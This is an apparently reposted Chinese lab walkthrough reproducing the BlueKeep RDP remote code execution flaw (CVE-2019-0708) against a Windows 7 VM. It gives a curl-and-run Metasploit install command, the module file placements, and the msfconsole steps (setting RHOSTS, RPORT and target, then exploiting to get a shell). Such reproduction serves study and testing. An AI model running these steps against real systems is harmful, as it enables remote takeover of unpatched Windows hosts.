CVE-2019-0708遠程桌面代碼執行漏洞復現


漏洞環境

使用VMware 安裝Windows7 SP1模擬受害機

 

 

利用

攻擊工具准備

  • 1.使用如下命令一鍵更新安裝的metasploit框架
  • curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 msfinstall && ./msfinstall

     

  • 2.下載參考中的攻擊套件放置文件到MSF的相應文件夾(如果已存在同名文件,直接覆蓋即可)
  • rdp.rb  - > /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
    rdp_scanner.rb  - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    cve_2019_0708_bluekeep.rb  - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    cve_2019_0708_bluekeep_rce.rb  - > /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

 

 

 

攻擊命令

使用msfconsole展示進入Metasploit的框架

展示進入以后使用reload_all重新加載0708rdp模塊利用

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce啟用0708RDP模塊攻擊

使用info查看工具相關信息以及設置

 可見關鍵設置主要為RHOSTSRPORT\target

使用set RHOSTS 受害機IP設置受害機IP

使用set RPORT 受害機PORT設置受害機RDP端口號

使用set target ID數字(可選為0-4)設置受害機機器架構

這里我們使用的是VMware ,那么目標2滿足條件

使用exploit開始攻擊,等待建立連接 建立連接以后,使用獲得shell,再使用獲得交互式外殼 隨即完成攻擊,成功拿到受害者主機權限

 

 

參考

鏈接:https://pan.baidu.com/s/1v3B8Vvi26W7LWjO3IcsNZg 提取碼:ml9g 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM